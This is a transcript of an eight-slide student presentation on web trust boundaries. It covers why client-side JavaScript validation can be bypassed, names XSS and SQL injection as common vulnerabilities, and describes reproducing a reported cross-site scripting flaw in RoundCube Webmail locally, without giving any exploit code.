Web%20Trust%20Boundaries%20and%20Security%20Vulnerabilities - PowerPoint PPT Presentation

About This Presentation
Title:

Web%20Trust%20Boundaries%20and%20Security%20Vulnerabilities

Description:

Using a web crawler (Larbin), we sought for Java applets. ... Prevalent, because web apps cross trust boundaries. A malicious user will try to exploit these ... – PowerPoint PPT presentation

Number of Views:73
Avg rating:3.0/5.0
Slides: 8
Provided by: loca198
Category:

less

Transcript and Presenter's Notes

Title: Web%20Trust%20Boundaries%20and%20Security%20Vulnerabilities


1
Web Trust Boundaries andSecurity Vulnerabilities
  • Haris Volos and Hidayat Teonadi
  • CS739 Distributed Systems

2
Problem
  • Web of Trust
  • Web crosses many trust boundaries
  • To avoid Careless Delegation of Trust should
    follow principles
  • Be specific
  • Who is in your trusted group?
  • What actions do we trust them to take?
  • Be careful
  • Bad design example
  • A server offloads work to a client that trusts,
    but client is either malicious or is bypassed.

3
Starting point...Java Applets
  • Hypothesis
  • Applets perform computation on client browser on
    behalf of the server.
  • Using a web crawler (Larbin), we sought for Java
    applets.
  • Besides Java chat applications, other results
    seem uninteresting.
  • Conclusion
  • Applets usage is not rampant.

4
Web Apps JavaScript
  • Interactive Web Applications
  • Main app resides in server-side (Servlet)
  • Use JavaScript for client-side computation
  • Example input data validation
  • Robust Web Applications
  • JavaScript can be easily circumvented.
  • Can be just disabled by browsers.
  • Never rely solely on JavaScript client-side
    validation.

5
Security Vulnerabilities
  • Prevalent, because web apps cross trust
    boundaries
  • A malicious user will try to exploit these
  • Web app must protect itself
  • Is cryptography enough? No!
  • Must validate any data that crosses the trust
    boundary
  • Example Vulnerabilities
  • Cross site scripting, SQL Injection

6
Case Study RoundCube Webmail
  • RoundCube Webmail is a browser based IMAP client.
    Uses a backend Apache/PHP/MySQL.
  • RSnake from ha.ckers.org exposed a type 1 cross
    site scripting (XSS) vulnerability
  • Type-1 XSS allows foreign code injection into a
    server generated dynamic page.
  • Exploit scenario malicious script can silently
    obtain sensitive credentials in the form of
    cookies.
  • We managed to reproduce the XSS vulnerability
    locally.
  • Realized how seemingly adequate server-side
    validation can still be circumvented.

7
Next Step
  • Study trust boundary more broadly
  • Find more web applications
  • Use a Web Vulnerability Scanner (e.g. Gamja) to
    guide search
  • Expose vulnerabilities
  • Study them, and
  • Propose some corrections
Write a Comment
User Comments (0)
About PowerShow.com